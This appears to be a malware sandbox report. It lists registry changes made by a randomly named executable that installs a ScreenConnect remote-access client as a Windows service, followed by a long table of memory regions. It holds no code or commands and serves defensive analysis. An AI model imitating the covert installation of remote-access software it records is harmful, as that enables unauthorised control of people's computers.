HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\Files
ScreenConnect.Client.dll_7b0ea606092ddbcb
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\Files
ScreenConnect.Windows.dll_fa5f7fd8f7c108bb
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Components\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
SubstructureCreated
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
Blob
HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C
Blob
\REGISTRY\A\{6418c940-f89e-06b7-f3db-554c1b972fb0}\Root\InventoryApplicationFile\96r3ggxntq.exe|15b645f72c66d5c3
ProgramId
\REGISTRY\A\{6418c940-f89e-06b7-f3db-554c1b972fb0}\Root\InventoryApplicationFile\96r3ggxntq.exe|15b645f72c66d5c3
FileId
\REGISTRY\A\{6418c940-f89e-06b7-f3db-554c1b972fb0}\Root\InventoryApplicationFile\96r3ggxntq.exe|15b645f72c66d5c3
LowerCaseLongPath
\REGISTRY\A\{6418c940-f89e-06b7-f3db-554c1b972fb0}\Root\InventoryApplicationFile\96r3ggxntq.exe|15b645f72c66d5c3
LongPathHash
\REGISTRY\A\{6418c940-f89e-06b7-f3db-554c1b972fb0}\Root\InventoryApplicationFile\96r3ggxntq.exe|15b645f72c66d5c3
Name
\REGISTRY\A\{6418c940-f89e-06b7-f3db-554c1b972fb0}\Root\InventoryApplicationFile\96r3ggxntq.exe|15b645f72c66d5c3
OriginalFileName
\REGISTRY\A\{6418c940-f89e-06b7-f3db-554c1b972fb0}\Root\InventoryApplicationFile\96r3ggxntq.exe|15b645f72c66d5c3
Publisher
\REGISTRY\A\{6418c940-f89e-06b7-f3db-554c1b972fb0}\Root\InventoryApplicationFile\96r3ggxntq.exe|15b645f72c66d5c3
Version
\REGISTRY\A\{6418c940-f89e-06b7-f3db-554c1b972fb0}\Root\InventoryApplicationFile\96r3ggxntq.exe|15b645f72c66d5c3
BinFileVersion
\REGISTRY\A\{6418c940-f89e-06b7-f3db-554c1b972fb0}\Root\InventoryApplicationFile\96r3ggxntq.exe|15b645f72c66d5c3
BinaryType
\REGISTRY\A\{6418c940-f89e-06b7-f3db-554c1b972fb0}\Root\InventoryApplicationFile\96r3ggxntq.exe|15b645f72c66d5c3
ProductName
\REGISTRY\A\{6418c940-f89e-06b7-f3db-554c1b972fb0}\Root\InventoryApplicationFile\96r3ggxntq.exe|15b645f72c66d5c3
ProductVersion
\REGISTRY\A\{6418c940-f89e-06b7-f3db-554c1b972fb0}\Root\InventoryApplicationFile\96r3ggxntq.exe|15b645f72c66d5c3
LinkDate
\REGISTRY\A\{6418c940-f89e-06b7-f3db-554c1b972fb0}\Root\InventoryApplicationFile\96r3ggxntq.exe|15b645f72c66d5c3
BinProductVersion
\REGISTRY\A\{6418c940-f89e-06b7-f3db-554c1b972fb0}\Root\InventoryApplicationFile\96r3ggxntq.exe|15b645f72c66d5c3
AppxPackageFullName
\REGISTRY\A\{6418c940-f89e-06b7-f3db-554c1b972fb0}\Root\InventoryApplicationFile\96r3ggxntq.exe|15b645f72c66d5c3
AppxPackageRelativeId
\REGISTRY\A\{6418c940-f89e-06b7-f3db-554c1b972fb0}\Root\InventoryApplicationFile\96r3ggxntq.exe|15b645f72c66d5c3
Size
\REGISTRY\A\{6418c940-f89e-06b7-f3db-554c1b972fb0}\Root\InventoryApplicationFile\96r3ggxntq.exe|15b645f72c66d5c3
Language
\REGISTRY\A\{6418c940-f89e-06b7-f3db-554c1b972fb0}\Root\InventoryApplicationFile\96r3ggxntq.exe|15b645f72c66d5c3
Usn
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
PerfMMFileName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Windows Live ID Token Issuer\Certificates\2C85006A1A028BCC349DF23C474724C055FDE8B6
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Windows Live ID Token Issuer\Certificates\B68D8F953E551914324E557E6164D68B9926650C
Blob
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02uojjzuramgtrlu
Reason
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02iekplzegkfhdmf
DeviceId
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02iekplzegkfhdmf
Provision Friday, October 25, 2024 13:27:27
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02iekplzegkfhdmf
AppIdList
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02kzybzvbimeevxb
Request Friday, October 25, 2024 13:27:32
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02kzybzvbimeevxb
Response Friday, October 25, 2024 13:27:32
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02kzybzvbimeevxb
Reason
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02jvqbeoqxjpylvl
DeviceId
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02jvqbeoqxjpylvl
AppIdList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02uojjzuramgtrlu
AppIdList
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18
ValidDeviceId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL
GlobalDeviceUpdateTime
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02iekplzegkfhdmf
DeviceId
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18
ValidDeviceId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_USERS.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC
Data
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02iekplzegkfhdmf
DeviceId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02iekplzegkfhdmf
DeviceId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003
ValidDeviceId
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02kzybzvbimeevxb
AppIdList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\AuthCookies\Live\Default\DIDC
Data
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02jvqbeoqxjpylvl
DeviceId
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003
ValidDeviceId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\AuthCookies\Live\Default\DIDC
Data
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02jvqbeoqxjpylvl
DeviceId
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\ExtendedProperties
LID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\AuthCookies\Live\Default\DIDC
Data
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02jvqbeoqxjpylvl
DeviceId
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f
lock!0e00000019914e007c0e0000d41c0000000000000000000075d2a3390327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c
lock!0c00000019914e007c0e0000d41c0000000000000000000075d2a3390327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea
lock!0a00000019914e007c0e0000d41c0000000000000000000075d2a3390327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af
lock!0800000019914e007c0e0000d41c0000000000000000000075d2a3390327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883
lock!0600000019914e007c0e0000d41c0000000000000000000075d2a3390327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
lock!0400000019914e007c0e0000d41c0000000000000000000075d2a3390327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee
lock!0200000019914e007c0e0000d41c0000000000000000000075d2a3390327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f
lock!1c00000028914e007c0e0000d41c000000000000000000001e35a6390327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c
lock!1a00000028914e007c0e0000d41c000000000000000000001e35a6390327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea
lock!1800000028914e007c0e0000d41c000000000000000000001e35a6390327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af
lock!1600000028914e007c0e0000d41c000000000000000000001e35a6390327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883
lock!1400000028914e007c0e0000d41c000000000000000000001e35a6390327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b
lock!1200000028914e007c0e0000d41c000000000000000000001e35a6390327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_none_394ffef6a8000aee
lock!1000000028914e007c0e0000d41c000000000000000000001e35a6390327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\Marks\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
lock!1d00000048914e007c0e0000d41c0000000000000000000004faaa390327db01
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\F_scre..tion_25b0fbb6ef7eb094_98134c89f0fa827c
LastRunVersion
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gc_scre..tion_503889a8656f441d
LastRunVersion
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Families\Gi_scre..tion_25b0fbb6ef7eb094_9edfe039055229dd
LastRunVersion
HKEY_CURRENT_USER_Classes\Software\Microsoft\Windows\CurrentVersion\Deployment\SideBySide\2.0\StateManager\Applications\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42
HasRunBefore
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
AutoBackupLogFiles
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application\ScreenConnect
EventMessageFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (ae095c23-8e22-4747-b9a0-c8c8b34ba57d)
ImagePath
There are 210 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
2768A812000
trusted library allocation
page read and write
5690000
unkown
page readonly
1A9AC000
stack
page read and write
E9A187E000
unkown
page readonly
1C600000
heap
page read and write
25CF78A0000
trusted library allocation
page read and write
2769A208000
trusted library allocation
page read and write
1CEA36F2000
heap
page read and write
A8E000
stack
page read and write
7FFE7DC80000
trusted library allocation
page read and write
276A5F10000
heap
page read and write
1CEA36F0000
heap
page read and write
276A4146000
heap
page read and write
65B000
heap
page read and write
1CEA3723000
heap
page read and write
1CEA3135000
heap
page read and write
1CEA3135000
heap
page read and write
2D31000
trusted library allocation
page read and write
11F0000
heap
page read and write
25CF2280000
heap
page read and write
3930000
unkown
page readonly
1CEA3135000
heap
page read and write
7FFE7DC60000
trusted library allocation
page read and write
CC27FFE000
stack
page read and write
156F000
trusted library allocation
page read and write
E9A0A7E000
unkown
page readonly
CC2719F000
stack
page read and write
1CEA368F000
heap
page read and write
810000
trusted library allocation
page read and write
1CEA3133000
heap
page read and write
1CEA3702000
heap
page read and write
7FFE7E070000
trusted library allocation
page read and write
173E000
stack
page read and write
1CEA3135000
heap
page read and write
276A2890000
heap
page execute and read and write
39AE000
stack
page read and write
E9A157B000
stack
page read and write
276885F5000
heap
page read and write
561C000
stack
page read and write
11E0000
trusted library allocation
page read and write
25CF3410000
trusted library section
page readonly
1CEA3129000
heap
page read and write
25CF247D000
heap
page read and write
276A415C000
heap
page read and write
7FFE7DC40000
trusted library allocation
page read and write
25CF7AC2000
heap
page read and write
1ADC5000
heap
page read and write
7FFE7DF00000
trusted library allocation
page read and write
5C0000
heap
page read and write
BC3000
unkown
page readonly
1436000
trusted library allocation
page read and write
7FFE7E010000
trusted library allocation
page read and write
1CEA3135000
heap
page read and write
39EE000
stack
page read and write
CC284FD000
stack
page read and write
7FFE7DEB0000
trusted library allocation
page read and write
790000
heap
page read and write
1CEA3133000
heap
page read and write
2768A512000
trusted library allocation
page read and write
7FFE7DF05000
trusted library allocation
page read and write
2768A21E000
trusted library allocation
page read and write
276A42F9000
heap
page read and write
2768A1DA000
trusted library allocation
page read and write
800000
trusted library allocation
page read and write
BB1000
unkown
page execute read
1B8E3000
heap
page read and write
1690000
trusted library allocation
page read and write
12F0000
heap
page read and write
1CEA315D000
heap
page read and write
276A4712000
trusted library allocation
page read and write
1CEA3108000
heap
page read and write
2604D037000
heap
page read and write
1CEA310E000
heap
page read and write
1CEA3129000
heap
page read and write
1CEA291A000
heap
page read and write
1B720000
heap
page execute and read and write
1CEA3600000
heap
page read and write
1CEA3673000
heap
page read and write
1CEA3702000
heap
page read and write
276887C0000
trusted library allocation
page read and write
2604D124000
heap
page read and write
1BC78000
heap
page read and write
7FFE7DE60000
trusted library allocation
page execute and read and write
DD0000
heap
page read and write
7FFE7DC6D000
trusted library allocation
page execute and read and write
25CF7A1D000
heap
page read and write
2768A664000
trusted library allocation
page read and write
1CEA312C000
heap
page read and write
1469000
heap
page read and write
276A4163000
heap
page read and write
25CF7A60000
heap
page read and write
7FFE7DDE0000
trusted library allocation
page read and write
276887B0000
heap
page execute and read and write
276885F0000
heap
page read and write
7FFE7DD06000
trusted library allocation
page execute and read and write
82A000
heap
page read and write
25CF2D1B000
heap
page read and write
7ED000
trusted library allocation
page execute and read and write
1CEA315B000
heap
page read and write
1201000
trusted library allocation
page read and write
1A0000
heap
page read and write
1CEA3133000
heap
page read and write
7FFE7E1C0000
trusted library allocation
page read and write
1CEA3155000
heap
page read and write
1CEA36BC000
heap
page read and write
1CEA2FB0000
remote allocation
page read and write
CC27BF8000
stack
page read and write
E9A067E000
unkown
page readonly
276A236D000
heap
page read and write
1CEA3158000
heap
page read and write
37C0000
trusted library allocation
page read and write
E9A1C7B000
stack
page read and write
2604D513000
heap
page read and write
36E6000
trusted library allocation
page read and write
1CEA3178000
heap
page read and write
276A5FA0000
heap
page read and write
16F0000
heap
page read and write
1AD09000
heap
page read and write
1B87F000
stack
page read and write
11B0000
trusted library allocation
page read and write
8C3000
heap
page read and write
157A000
trusted library allocation
page read and write
1CEA369C000
heap
page read and write
3F5F000
trusted library allocation
page read and write
5E1000
heap
page read and write
276A2850000
heap
page read and write
CC27DFA000
stack
page read and write
25CF37D0000
trusted library allocation
page read and write
25CF3420000
trusted library section
page readonly
276A2F20000
heap
page read and write
817000
trusted library allocation
page execute and read and write
1CEA3130000
heap
page read and write
1CEA294C000
heap
page read and write
6E6000
heap
page read and write
B60000
heap
page read and write
1CEA283A000
heap
page read and write
7FFE7E170000
trusted library allocation
page read and write
25CF2473000
heap
page read and write
7FFE7DC73000
trusted library allocation
page read and write
3E0E000
stack
page read and write
2604D413000
heap
page read and write
5680000
heap
page execute and read and write
1CEA2902000
heap
page read and write
1CEA3130000
heap
page read and write
E9A24FE000
stack
page read and write
276A1FE0000
trusted library allocation
page read and write
757000
heap
page read and write
521E000
stack
page read and write
7FFE7DE57000
trusted library allocation
page read and write
87E000
stack
page read and write
7FFE7DE94000
trusted library allocation
page read and write
1CEA28A8000
heap
page read and write
40B0000
trusted library allocation
page read and write
25CF7AEB000
heap
page read and write
7FFE7E142000
trusted library allocation
page read and write
1CEA3716000
heap
page read and write
4C80000
heap
page read and write
1CEA3685000
heap
page read and write
7FFE7DCEC000
trusted library allocation
page execute and read and write
56EE000
stack
page read and write
25CF2490000
heap
page read and write
11E9000
trusted library allocation
page read and write
276884C0000
heap
page read and write
1CEA3135000
heap
page read and write
E9A1F7E000
unkown
page readonly
276A2BBC000
heap
page read and write
E9A0B7C000
stack
page read and write
25CF79A0000
trusted library allocation
page read and write
7FFE7DE0D000
trusted library allocation
page read and write
E9A16FE000
stack
page read and write
CDBC77E000
unkown
page readonly
11EB000
trusted library allocation
page read and write
166D000
trusted library allocation
page execute and read and write
7FFE7DD16000
trusted library allocation
page execute and read and write
7FFE7DE70000
trusted library allocation
page read and write
2604D500000
heap
page read and write
1CEA3110000
heap
page read and write
1CEA3184000
heap
page read and write
25CF3140000
trusted library allocation
page read and write
25CF7A4E000
heap
page read and write
1CEA3183000
heap
page read and write
3AB000
stack
page read and write
10F1000
stack
page read and write
CDBC37E000
stack
page read and write
276886CC000
heap
page read and write
812000
trusted library allocation
page read and write
990000
heap
page read and write
276886B6000
heap
page read and write
2768A05D000
trusted library allocation
page read and write
57EE000
stack
page read and write
1CEA3184000
heap
page read and write
7FFE7DFA0000
trusted library allocation
page read and write
1CEA36AE000
heap
page read and write
25CF23B0000
trusted library allocation
page read and write
1BD80000
trusted library section
page readonly
1CEA315F000
heap
page read and write
E9A1A7C000
stack
page read and write
1CEA28D3000
heap
page read and write
1CEA312F000
heap
page read and write
25CF7A00000
heap
page read and write
276A2F3B000
heap
page read and write
1CEA317C000
heap
page read and write
25CF7ABF000
heap
page read and write
3F0E000
stack
page read and write
1CEA36DD000
heap
page read and write
1CEA36C1000
heap
page read and write
1B880000
trusted library section
page read and write
1CEA2790000
trusted library allocation
page read and write
1CEA36E3000
heap
page read and write
13DF000
trusted library allocation
page read and write
27688690000
heap
page read and write
7FFE7E14A000
trusted library allocation
page read and write
CC27CF4000
stack
page read and write
276A2810000
heap
page read and write
1CEA3110000
heap
page read and write
1434000
trusted library allocation
page read and write
930000
heap
page read and write
1CEA3133000
heap
page read and write
520000
heap
page read and write
276A2B4B000
heap
page read and write
276A4168000
heap
page read and write
1CEA28C6000
heap
page read and write
3FA0000
trusted library allocation
page read and write
1CEA28CC000
heap
page read and write
168A000
trusted library allocation
page execute and read and write
1CEA3712000
heap
page read and write
1AD01000
heap
page read and write
276A4125000
heap
page read and write
1ADA8000
heap
page read and write
1CEA36CF000
heap
page read and write
2769A1B3000
trusted library allocation
page read and write
7FFE7DEF9000
trusted library allocation
page read and write
7FFE7DC32000
trusted library allocation
page read and write
8B6000
unkown
page readonly
3740000
heap
page execute and read and write
1CEA3130000
heap
page read and write
1CEA3130000
heap
page read and write
25CF24FF000
heap
page read and write
E9A13FE000
stack
page read and write
65D000
heap
page read and write
1CEA28B4000
heap
page read and write
1CEA369B000
heap
page read and write
8B4000
unkown
page write copy
BC1000
unkown
page read and write
3F70000
trusted library allocation
page execute and read and write
2D2E000
stack
page read and write
1CEA293B000
heap
page read and write
1CEA2760000
heap
page read and write
1CEA2FC0000
remote allocation
page read and write
1CEA294C000
heap
page read and write
1CEA3153000
heap
page read and write
2421000
trusted library allocation
page read and write
802000
trusted library allocation
page read and write
1697000
trusted library allocation
page execute and read and write
7FFE7DFE2000
trusted library allocation
page read and write
7FFE7DC8B000
trusted library allocation
page execute and read and write
68A000
heap
page read and write
1CEA36B6000
heap
page read and write
1CEA36D5000
heap
page read and write
2604D013000
unkown
page read and write
A6F000
heap
page read and write
1CEA317D000
heap
page read and write
4F4000
stack
page read and write
1CEA36DF000
heap
page read and write
1BC82000
heap
page read and write
7FFE7DE80000
trusted library allocation
page read and write
E9A10FE000
stack
page read and write
7FFE7DC43000
trusted library allocation
page read and write
1276000
heap
page read and write
25CF7940000
trusted library allocation
page read and write
7FFE7DC5D000
trusted library allocation
page execute and read and write
1CEA3570000
remote allocation
page read and write
7FFE7E050000
trusted library allocation
page read and write
7FFE7DC63000
trusted library allocation
page execute and read and write
7FFE7DC3D000
trusted library allocation
page execute and read and write
276A41C8000
heap
page read and write
DC5000
heap
page read and write
1CEA2861000
heap
page read and write
143E000
heap
page read and write
276A4110000
heap
page read and write
8A0000
unkown
page readonly
7FFE7DC30000
trusted library allocation
page read and write
2769A1A4000
trusted library allocation
page read and write
13D000
stack
page read and write
276A5F72000
heap
page read and write
276A4156000
heap
page read and write
7FFE7DE10000
trusted library allocation
page read and write
2768A222000
trusted library allocation
page read and write
1CEA3133000
heap
page read and write
25CF2C15000
heap
page read and write
7FFE7DD16000
trusted library allocation
page read and write
E9A1B7E000
unkown
page readonly
2BF0000
heap
page execute and read and write
1476000
heap
page read and write
1BC85000
heap
page read and write
7EA000
heap
page read and write
1CEA3132000
heap
page read and write
1CEA2898000
heap
page read and write
7E3000
trusted library allocation
page execute and read and write
1BC4E000
heap
page read and write
A0000
unkown
page readonly
120F000
stack
page read and write
A2000
unkown
page readonly
7FFE7E040000
trusted library allocation
page read and write
1CEA3135000
heap
page read and write
1CEA310E000
heap
page read and write
1CEA368B000
heap
page read and write
1CEA3712000
heap
page read and write
25CF79B0000
trusted library allocation
page read and write
DA0000
heap
page read and write
1AD19000
heap
page read and write
E9A257E000
unkown
page readonly
276A2F05000
heap
page read and write
7FFE7DFFC000
trusted library allocation
page read and write
1CEA3129000
heap
page read and write
2242000
unkown
page readonly
25CF2495000
heap
page read and write
7FFE7E1A0000
trusted library allocation
page read and write
2768A535000
trusted library allocation
page read and write
8AD000
unkown
page readonly
1B0BF000
stack
page read and write
7FFE7DFD0000
trusted library allocation
page read and write
1BC6C000
heap
page read and write
124E000
stack
page read and write
1CEA3132000
heap
page read and write
7FFE7DC8C000
trusted library allocation
page execute and read and write
1ADB9000
heap
page read and write
E9A197E000
unkown
page readonly
7FFE7DEB0000
trusted library allocation
page read and write
BB0000
unkown
page readonly
1CEA315D000
heap
page read and write
900000
heap
page execute and read and write
1CEA36EC000
heap
page read and write
1CEA294C000
heap
page read and write
1664000
trusted library allocation
page read and write
1CEA312E000
heap
page read and write
1CEA36A9000
heap
page read and write
1242F000
trusted library allocation
page read and write
2769A171000
trusted library allocation
page read and write
11C1000
heap
page read and write
1CEA2883000
heap
page read and write
276886D0000
heap
page read and write
79E000
heap
page read and write
1CEA3156000
heap
page read and write
1C5ED000
stack
page read and write
1CEA3133000
heap
page read and write
25CF7990000
trusted library allocation
page read and write
1CEA3179000
heap
page read and write
12CE000
stack
page read and write
1CEA2898000
heap
page read and write
1CEA3697000
heap
page read and write
1242D000
trusted library allocation
page read and write
E9A117E000
unkown
page readonly
1CEA3132000
heap
page read and write
1CEA3107000
heap
page read and write
2604D100000
trusted library allocation
page read and write
140F000
stack
page read and write
2769A180000
trusted library allocation
page read and write
CDBB7FE000
stack
page read and write
2768A236000
trusted library allocation
page read and write
CDBB679000
stack
page read and write
1CEA315B000
heap
page read and write
27688715000
heap
page read and write
378A000
trusted library allocation
page read and write
1CEA315D000
heap
page read and write
1CEA291A000
heap
page read and write
3A20000
unkown
page readonly
3F50000
trusted library allocation
page read and write
1CEA2884000
heap
page read and write
7FFE7DF70000
trusted library allocation
page read and write
996000
heap
page read and write
1CEA36CD000
heap
page read and write
1686000
trusted library allocation
page execute and read and write
1AEB0000
heap
page read and write
1CEA291A000
heap
page read and write
2201000
trusted library allocation
page read and write
CC277FE000
stack
page read and write
CC282FD000
stack
page read and write
103C000
stack
page read and write
1CEA317D000
heap
page read and write
25CF7AF1000
heap
page read and write
6E0000
heap
page read and write
27688835000
heap
page read and write
890000
trusted library allocation
page read and write
2768A06C000
trusted library allocation
page read and write
1CEA2660000
heap
page read and write
25CF7930000
trusted library allocation
page read and write
25CF7890000
trusted library allocation
page read and write
2768A4A1000
trusted library allocation
page read and write
8B4000
unkown
page read and write
2C20000
heap
page read and write
560000
trusted library allocation
page read and write
551D000
stack
page read and write
2768A561000
trusted library allocation
page read and write
1C180000
heap
page read and write
2604D02B000
heap
page read and write
25CF2413000
heap
page read and write
E9A1D7E000
unkown
page readonly
7FFE7DE76000
trusted library allocation
page read and write
1650000
trusted library allocation
page read and write
1CEA315D000
heap
page read and write
276A2D13000
heap
page read and write
9FC000
stack
page read and write
4C7C000
heap
page read and write
7FFE7DF90000
trusted library allocation
page read and write
25CF22A0000
heap
page read and write
1CEA3135000
heap
page read and write
25CF247A000
heap
page read and write
1CEA28D9000
heap
page read and write
7FFE7DE60000
trusted library allocation
page read and write
276A41F6000
heap
page read and write
664000
heap
page read and write
2768A232000
trusted library allocation
page read and write
276A2D10000
heap
page read and write
1CEA3159000
heap
page read and write
1ADF0000
unkown
page readonly
276A41A4000
heap
page read and write
2768A61B000
trusted library allocation
page read and write
1CEA2892000
heap
page read and write
1CEA3135000
heap
page read and write
1CEA291A000
heap
page read and write
25CF37A1000
trusted library allocation
page read and write
1CEA36AA000
heap
page read and write
25CF7850000
trusted library allocation
page read and write
1CEA36ED000
heap
page read and write
A38000
heap
page read and write
1CEA315D000
heap
page read and write
2768A69B000
trusted library allocation
page read and write
